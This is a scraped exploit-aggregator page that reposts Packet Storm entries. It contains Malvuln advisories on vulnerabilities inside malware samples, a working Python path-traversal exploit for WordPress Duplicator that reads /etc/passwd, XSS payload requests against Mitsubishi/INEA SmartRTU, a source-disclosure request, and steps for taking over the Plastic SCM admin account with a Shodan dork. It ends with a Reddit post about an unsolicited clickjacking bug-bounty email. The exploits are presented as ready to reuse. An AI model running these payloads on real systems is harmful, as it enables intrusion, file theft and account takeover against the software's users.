Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Trojan-Spy.Win32.Ardamax.ocx Insecure Permissions
https://1.bp.blogspot.com/-qwhQ-DvjXeo/WWlvAVNcU1I/AAAAAAAAIKM/AQaWmoLkqQQ6jMUPY28Kv2eNsZnw7PnKQCLcBGAs/s1600/h122.png
Trojan-Spy.Win32.Ardamax.ocx malware suffers from an insecure permissions vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Trojan-Spy.Win32.Ardamax.ocx Insecure Permissions
https://1.bp.blogspot.com/-qwhQ-DvjXeo/WWlvAVNcU1I/AAAAAAAAIKM/AQaWmoLkqQQ6jMUPY28Kv2eNsZnw7PnKQCLcBGAs/s1600/h122.png
Trojan-Spy.Win32.Ardamax.ocx malware suffers from an insecure permissions vulnerability.
MD5 |
1958fc9f88dc93972c6926deb4aa378bDownload
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/78a39875a0adb110cf3c7de3a0d1384c.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Trojan-Spy.Win32.Ardamax.ocx
Vulnerability: Insecure Permissions
Description: The malware creates an dir named "MUWOCI" or "28463" with insecure permissions under Windows\SysWOW64 granting full (F) permissions to the Everyone user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.
Type: PE32
MD5: 78a39875a0adb110cf3c7de3a0d1384c
Vuln ID: MVID-2021-0362
Disclosure: 10/15/2021
Exploit/PoC:
C:\Windows\SysWOW64\MUWOCI>cacls HNI.001
C:\Windows\SysWOW64\MUWOCI\HNI.001 Everyone:(ID)F
C:\Windows\SysWOW64\MUWOCI>cd ..
C:\Windows\SysWOW64>cacls MUWOCI
C:\Windows\SysWOW64\MUWOCI Everyone:F
Everyone:(OI)(CI)(IO)F
C:\Windows\SysWOW64>dir MUWOCI
Volume in drive C has no label.
Directory of C:\Windows\SysWOW64\MUWOCI
10/05/2021 10:11 PM 62,464 HNI.001
1 File(s) 62,464 bytes
C:\Windows\SysWOW64>cacls 28463
C:\Windows\SysWOW64\28463 Everyone:F
Everyone:(OI)(CI)(IO)F
C:\Windows\SysWOW64>dir 28463
Volume in drive C has no label.
Directory of C:\Windows\SysWOW64\28463
10/05/2021 10:17 PM 402,944 AKV.exe
10/05/2021 10:17 PM 482 DQOC.001
10/05/2021 10:17 PM 7,680 DQOC.006
10/05/2021 10:17 PM 5,632 DQOC.007
10/05/2021 10:17 PM 483,840 DQOC.exe
5 File(s) 900,578 bytes
C:\Windows\SysWOW64>cacls 28463
C:\Windows\SysWOW64\28463 Everyone:F
Everyone:(OI)(CI)(IO)F
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Trojan-Spy.Win32.Ardamax.ocx Insecure Permissions
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Support Board 3.3.4 Cross Site Scripting
https://1.bp.blogspot.com/-gLNlUWq63_8/WWlvGRw0eoI/AAAAAAAAILQ/4OYXBaTeiPkRlDYcEes6gWLLrvO9LjoiQCLcBGAs/s1600/h138.png
Support Board version 3.3.4 suffers from a persistent cross site scripting vulnerability.
MD5 |
Download
# Exploit Title: Support Board 3.3.4 - 'Message' Stored Cross-Site Scripting (XSS)
# Date: 16/10/2021
# Exploit Author: John Jefferson Li
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Support Board 3.3.4 Cross Site Scripting
https://1.bp.blogspot.com/-gLNlUWq63_8/WWlvGRw0eoI/AAAAAAAAILQ/4OYXBaTeiPkRlDYcEes6gWLLrvO9LjoiQCLcBGAs/s1600/h138.png
Support Board version 3.3.4 suffers from a persistent cross site scripting vulnerability.
MD5 |
e85bf621f79eb83adfb3108965fda106Download
# Exploit Title: Support Board 3.3.4 - 'Message' Stored Cross-Site Scripting (XSS)
# Date: 16/10/2021
# Exploit Author: John Jefferson Li
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Support Board 3.3.4 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Company's Recruitment Management System 1.0 Cross Site Scripting
___________________________
@hacking_Attack
@Hacking_Video
Company's Recruitment Management System 1.0 Cross Site Scripting
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Company's Recruitment Management System 1.0 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Trojan-Proxy.Win32.Ranky.dh Unauthenticated Open Proxy
https://2.bp.blogspot.com/-S-N0q2XL8x8/WWlu5FDj1eI/AAAAAAAAIJA/vGskVQb_QegQZ0-UZMHSDeFJ08ju6pdGQCLcBGAs/s1600/h104.png
Trojan-Proxy.Win32.Ranky.dh malware suffers from an unauthenticated open proxy vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Trojan-Proxy.Win32.Ranky.dh Unauthenticated Open Proxy
https://2.bp.blogspot.com/-S-N0q2XL8x8/WWlu5FDj1eI/AAAAAAAAIJA/vGskVQb_QegQZ0-UZMHSDeFJ08ju6pdGQCLcBGAs/s1600/h104.png
Trojan-Proxy.Win32.Ranky.dh malware suffers from an unauthenticated open proxy vulnerability.
MD5 |
d05d94921a4f52689fa2065c5b1708dfDownload
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/dcc58648868f1d5c0d7c53250f1bd5c9.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Trojan-Proxy.Win32.Ranky.dh
Vulnerability: Unauthenticated Open Proxy
Description: The malware listens on TCP port 17503. Third-party attackers who can connect to the infected system can relay requests from the original connection to the destination and then back to the origination system. Attackers may then be able to launch attacks, download files or port scan third party systems and it will appear as the attacks originated from that infected host.
Type: PE32
MD5: dcc58648868f1d5c0d7c53250f1bd5c9
Vuln ID: MVID-2021-0364
Disclosure: 10/15/2021
Exploit/PoC:
Port scan)
curl -x http://192.168.18.125:17503 http://192.168.18.128:21
220 INetSim FTP Service ready.
500 Unknown command.
Download filez)
curl -x http://192.168.18.125:17503 http://192.168.18.128/DOOM.exe --output DOOM.exe
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 24576 100 24576 0 0 6144 0 0:00:04 0:00:04 --:--:-- 5957
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Trojan-Proxy.Win32.Ranky.dh Unauthenticated Open Proxy
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WordPress Duplicator 1.3.26 Arbitrary File Read
https://3.bp.blogspot.com/-vLPaJ0bXchM/WWlvcii8AuI/AAAAAAAAIPY/lohzKYQrhRkUA5ocnA3xRTtIEj7YZIM-ACLcBGAs/s1600/h77.png
WordPress Duplicator plugin version 1.3.26 suffers from an unauthenticated arbitrary file read vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
WordPress Duplicator 1.3.26 Arbitrary File Read
https://3.bp.blogspot.com/-vLPaJ0bXchM/WWlvcii8AuI/AAAAAAAAIPY/lohzKYQrhRkUA5ocnA3xRTtIEj7YZIM-ACLcBGAs/s1600/h77.png
WordPress Duplicator plugin version 1.3.26 suffers from an unauthenticated arbitrary file read vulnerability.
MD5 |
18669dd16268ad8eff125d1a41041c75Download
# Exploit Title: Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read
# Date: October 16, 2021
# Exploit Author: nam3lum
# Vendor Homepage: https://wordpress.org/plugins/duplicator/
# Software Link: https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip]
# Version: 1.3.26
# Tested on: Ubuntu 16.04
# CVE : CVE-2020-11738
import requests as re
import sys
if len(sys.argv) != 3:
print("Exploit made by nam3lum.")
print("Usage: CVE-2020-11738.py http://192.168.168.167 /etc/passwd")
exit()
arg = sys.argv[1]
file = sys.argv[2]
URL = arg + "/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../.." + file
output = re.get(url = URL)
print(output.text)
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
WordPress Duplicator 1.3.26 Arbitrary File Read
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Mitsubishi Electric / INEA SmartRTU Cross Site Scripting
https://2.bp.blogspot.com/-ulQQD3v8DYI/WWlvnLww_dI/AAAAAAAAIRM/ialO7Idq8vAmWKoyuXUdK7x44tFKJsnBwCLcBGAs/s1600/hack_img4.png
Mitsubishi Electric and INEA SmartRTU suffer from a cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Mitsubishi Electric / INEA SmartRTU Cross Site Scripting
https://2.bp.blogspot.com/-ulQQD3v8DYI/WWlvnLww_dI/AAAAAAAAIRM/ialO7Idq8vAmWKoyuXUdK7x44tFKJsnBwCLcBGAs/s1600/hack_img4.png
Mitsubishi Electric and INEA SmartRTU suffer from a cross site scripting vulnerability.
MD5 |
1bf870c75a7a097da8ec1aaeb1ba24f0Download
# Exploit Title: Mitsubishi Electric & INEA SmartRTU - Reflected Cross-Site Scripting (XSS)
# Date: 2021-17-10
# Exploit Author: Hamit CİBO
# Vendor Homepage: https://www.inea.si
# Software Link: https://www.inea.si/telemetrija-in-m2m-produkti/mertu/
# Version: ME RTU
# Tested on: Windows
# CVE : CVE-2018-16061
# PoC
# Request
POST
/login.php/srdzz'onmouseover%3d'alert(1)'style%3d'position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%
3btop%3a0%3bleft%3a0%3b'bsmy8 HTTP/1.1
Host: **.**.**.***
Content-Length: 132
Cache-Control: max-age=0
Origin: http://**.**.**.***
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/68.0.3440.84
Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://**.**.**.***sss/login.php
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=el8pvccq5747u4qj9koio950l7
Connection: close
submitted=1&username=--
%3E%27%22%2F%3E%3C%2FsCript%3E%3CsvG+x%3D%22%3E%22+onload%3D%28co%5Cu006efirm%29%60%60&passw
ord=&Submit=Login
# Response
HTTP/1.1 200 OK
Date: Wed, 08 Aug 2018 08:14:25 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4
Vary: Accept-Encoding
Content-Length: 3573
Connection: close
Content-Type: text/html
action='/login.php/srdzz'onmouseover='alert(1)'style='position:absolute;width:100%;height:100%;top:0;left:0;'bsmy8'
method='post' accept-charset='UTF-8'>
Reference :
https://drive.google.com/file/d/1DEZQqfpIgcflY2cF6O0y7vtlWYe8Wjjv/view
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Mitsubishi Electric / INEA SmartRTU Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Mitsubishi Electric / INEA SmartRTU Source Code Disclosure
https://1.bp.blogspot.com/-5p3p8L1fqP0/WWlvePVRIQI/AAAAAAAAIPs/HQNau6TSJkE3hBLTqqPcfPLddrlr7m4uACLcBGAs/s1600/h81.png
Mitsubishi Electric and INEA SmartRTU suffer from a source code disclosure vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Mitsubishi Electric / INEA SmartRTU Source Code Disclosure
https://1.bp.blogspot.com/-5p3p8L1fqP0/WWlvePVRIQI/AAAAAAAAIPs/HQNau6TSJkE3hBLTqqPcfPLddrlr7m4uACLcBGAs/s1600/h81.png
Mitsubishi Electric and INEA SmartRTU suffer from a source code disclosure vulnerability.
MD5 |
583706d96894839f4f3b86a553072053Download
# Exploit Title: Mitsubishi Electric & INEA SmartRTU - Source Code Disclosure
# Date: 2021-17-10
# Exploit Author: Hamit CİBO
# Vendor Homepage: https://www.inea.si
# Software Link: https://www.inea.si/telemetrija-in-m2m-produkti/mertu/
# Version: ME RTU
# Tested on: Windows
# CVE : CVE-2018-16060
# PoC
# Request
GET /web HTTP/1.1
Host: **.**.**.***
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;
x64; Trident/5.0)
Connection: close
# Response
HTTP/1.1 200 OK
Date: Wed, 08 Aug 2018 08:09:53 GMT
Server: Apache/2.4.7 (Ubuntu)
Content-Location: web.tar
Vary: negotiate
TCN: choice
Last-Modified: Wed, 19 Nov 2014 09:40:36 GMT
ETag: "93800-5083300f58d00;51179459a2c00"
Accept-Ranges: bytes
Content-Length: 604160
Connection: close
Content-Type: application/x-tar
Reference :
https://drive.google.com/open?id=1QMHwTnBbIqrTkR0NEpnTKssYdi8vRsHH
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Mitsubishi Electric / INEA SmartRTU Source Code Disclosure
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Plastic SCM 10.0.16.5622 Insecure Direct Object Reference
https://3.bp.blogspot.com/-00fiGlDHfKo/WWlvZ5odqlI/AAAAAAAAIO4/nnZp17OtkHAWqiO0pbFBQSys2U4_yu8pACLcBGAs/s1600/h7.png
Plastic SCM version 10.0.16.5622 suffers from an insecure direct object reference vulnerability that lets an attacker set the administrative password.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Plastic SCM 10.0.16.5622 Insecure Direct Object Reference
https://3.bp.blogspot.com/-00fiGlDHfKo/WWlvZ5odqlI/AAAAAAAAIO4/nnZp17OtkHAWqiO0pbFBQSys2U4_yu8pACLcBGAs/s1600/h7.png
Plastic SCM version 10.0.16.5622 suffers from an insecure direct object reference vulnerability that lets an attacker set the administrative password.
MD5 |
f088be0f3c4ca9a1c3c79ded1aca8335Download
# Exploit Title: Plastic SCM 10.0.16.5622 - WebAdmin Server Access
# Shodan Dork: title:"Plastic SCM"
# Date: 18.10.2021
# Exploit Author: Basavaraj Banakar
# Vendor Homepage: https://www.plasticscm.com/
# Software Link: https://www.plasticscm.com/download/releasenotes/10.0.16.5622
# Version: Plastic SCM < 10.0.16.5622
# Tested on: Chrome,Firefox,Edge
# CVE : CVE-2021-41382
# Reference: https://infosecwriteups.com/story-of-google-hall-of-fame-and-private-program-bounty-worth-53559a95c468
# Exploit:
1. Navigate to target.com/account [This holds administrator login console]
2. Change URL to target.com/account/register [Here able to set new password for the adminstrator user]
3. Now after changing password of administrator and login to console and Navigate to target.com/configuration/authentication and set an new password for any of the users
4. Now navigate to target.com/webui/repos and login with the recently changed password for user i.e is in step 3
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Plastic SCM 10.0.16.5622 Insecure Direct Object Reference
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Worm.Win32.Fasong.c Unquoted Service Path
https://4.bp.blogspot.com/-hg5R_Iy9kqs/WWlu56TnyEI/AAAAAAAAIJM/rTW1_kDHOwg4grZYYDaMUD1TyZ2BewRDQCLcBGAs/s1600/h107.png
Worm.Win32.Fasong.c malware suffers from an unquoted service path vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Worm.Win32.Fasong.c Unquoted Service Path
https://4.bp.blogspot.com/-hg5R_Iy9kqs/WWlu56TnyEI/AAAAAAAAIJM/rTW1_kDHOwg4grZYYDaMUD1TyZ2BewRDQCLcBGAs/s1600/h107.png
Worm.Win32.Fasong.c malware suffers from an unquoted service path vulnerability.
MD5 |
db1404130b22139f3d55b7b99f48f51fDownload
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/bc6f4a283b6b8308c60bb70cc81edfd8.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Worm.Win32.Fasong.c
Vulnerability: Insecure Service Path
Description: The malware creates a service with an unquoted path. Third party attackers who can place an arbitrary executable under c:\ drive can potentially undermine the integrity of the malware by having it run theirs instead with SYSTEM privs.
Type: PE32
MD5: bc6f4a283b6b8308c60bb70cc81edfd8
Vuln ID: MVID-2021-0363
Dropped files: QIRNJ.EXE
Disclosure: 10/15/2021
Exploit/PoC:
C:\>sc qc VGUPL.EXE
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: VGUPL.EXE
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\VGUPL.EXE
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : VGUPL.EXE
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Worm.Win32.Fasong.c Unquoted Service Path
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
How I hacked Nepal’s ecommerce site and bought huge packs of kitkat for free! :)
Before few months when I was tired of doing my college assignments, I started to drill up my skills in ethical hacking. I used to practise…Continue reading on Medium »
Read more...
Before few months when I was tired of doing my college assignments, I started to drill up my skills in ethical hacking. I used to practise…Continue reading on Medium »
Read more...
All Resource For SQL Injection In One Blog
Hey Everyone ! Surendra Here ! Back With another Blog
Read more...
Hey Everyone ! Surendra Here ! Back With another Blog
Read more...
hacking: security in practice
Recieved an email from an "Ethical hacker" is this a scam?
Our company email address received an email from an ethical hacker, is this something serious that I need to look into or is it just a scam and I should just block and move on? The email states:
Hello Team,
submitted by /u/Artistic-Answer-8361
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Recieved an email from an "Ethical hacker" is this a scam?
Our company email address received an email from an ethical hacker, is this something serious that I need to look into or is it just a scam and I should just block and move on? The email states:
Hello Team,
As an Ethical Hacker i found some Vulnerabilities in your site one of them is as follows.
Issue : CLICK JACKING
Clickjacking, also known as a "UI redress attack", is when an attacker uses
multiple transparent or opaque layers to trick a user into clicking on a
button or link on another page when they were intending to click on the the
top level page. Thus, the attacker is "hijacking" clicks meant for their
page and routing them to another page, most likely owned by another
application, domain, or both.
Using a similar technique, keystrokes can also be hijacked. With a
carefully crafted combination of stylesheets, iframes, and text boxes, a
user can be led to believe they are typing in the password to their email
or bank account, but are instead typing into an invisible frame controlled
by the attacker.
PoC:
IMPACTS:
By using Clickjacking technique, an attacker hijack's click's meant for one page and route them to another page, most likely for another application, domain, or both.
Remediation:
Frame busting technique is the better framing protection
technique. Sending the proper X-Frame-Options HTTP response headers
that instruct the browser to not allow framing from other
domains
For Fix:
it is missing a X-FRAME header. a user with the help of some tricky css can trick the user click on the one click actions. . You should apply a X-FRAME header
Note: I’m hoping to receive a bounty reward for my current finding. I will be looking forward to hearing from you on this and will be reporting other vulnerabilities accordingly.
kind Regards SNAPSHOT submitted by /u/Artistic-Answer-8361
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Recieved an email from an "Ethical hacker" is this a scam?
Our company email address received an email from an ethical hacker, is this something serious that I need to look into or is it just a scam and I...